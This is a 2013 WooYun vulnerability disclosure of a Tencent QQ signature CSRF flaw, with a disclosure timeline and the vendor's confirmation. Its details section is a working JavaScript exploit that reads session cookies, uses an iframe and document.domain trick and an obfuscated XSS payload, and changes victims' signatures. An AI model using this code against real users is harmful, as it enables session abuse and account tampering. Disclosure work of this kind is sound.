当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-026966

漏洞标题:任意修改别人QQ签名漏洞(已有人中招)

相关厂商:腾讯

漏洞作者: zzzmode

提交时间:2013-06-26 16:59

修复时间:2013-08-10 17:00

公开时间:2013-08-10 17:00

漏洞类型:CSRF

危害等级:中

自评Rank:2

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-26: 细节已通知厂商并且等待厂商处理中
2013-06-26: 厂商已经确认,细节仅向厂商公开
2013-07-06: 细节向核心白帽子及相关领域专家公开
2013-07-16: 细节向普通白帽子公开
2013-07-26: 细节向实习白帽子公开
2013-08-10: 细节向公众公开

简要描述:

访问过腾讯的相关业务,然后浏览就可以修改别人的QQ签名了

详细说明:

function change_sign(){
  
    var skey=document.cookie.match(/skey=(@\w+)/)[1],
         uin=parseInt(document.cookie.match(/uin=o(\d+)/)[1],10);
     new Image().src='http://data.soso.com/bingo/72/ChangeLn.php?uin='+uin+'&skey='+skey+'&ln=这里是签名内容';
  }
 window.onload=function(){
	if(!window.ActiveXObject){
		document.domain="com";
		var iframe = document.createElement('iframe');
                  iframe.style.display = 'none';
		iframe.onload = function(){
          with(this.contentWindow){
            eval('!'+change_sign+'()');
          }
		};
		iframe.src = 'http://face.qq.com/ajax.proxy.html?domain=com';
		document.body.appendChild(iframe);
	}else{
		var iframe = document.createElement('iframe');
                iframe.style.display = 'none';
		iframe.src = 'http://game.wang.qq.com/game.html#?areaId="></object><script/defer>eval(String.fromCharCode(115,107,101,121,61,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,46,109,97,116,99,104,40,47,115,107,101,121,61,40,64,92,119,43,41,47,41,91,49,93,44,117,105,110,61,112,97,114,115,101,73,110,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,46,109,97,116,99,104,40,47,117,105,110,61,111,40,92,100,43,41,47,41,91,49,93,44,49,48,41,59,110,101,119,32,73,109,97,103,101,40,41,46,115,114,99,61,39,104,116,116,112,58,47,47,100,97,116,97,46,115,111,115,111,46,99,111,109,47,98,105,110,103,111,47,55,50,47,67,104,97,110,103,101,76,110,46,112,104,112,63,117,105,110,61,39,43,117,105,110,43,39,38,115,107,101,121,61,39,43,115,107,101,121,43,39,38,108,110,61,37,69,55,37,56,56,37,66,49,37,69,55,37,57,70,37,65,53,37,69,52,37,66,57,37,56,69,37,69,70,37,66,67,37,56,67,37,69,55,37,56,56,37,66,49,80,75,65,86,37,69,70,37,66,67,37,56,49,39,59))<\/script>';
		document.body.appendChild(iframe);
	}
}

漏洞证明:

这个自己打开试试就知道了,前提是登录浏览过腾讯业务,测试很简单的

qq1.jpg


qq2.jpg


qq3.png

修复方案:

版权声明:转载请注明来源 zzzmode@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-06-26 18:26

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无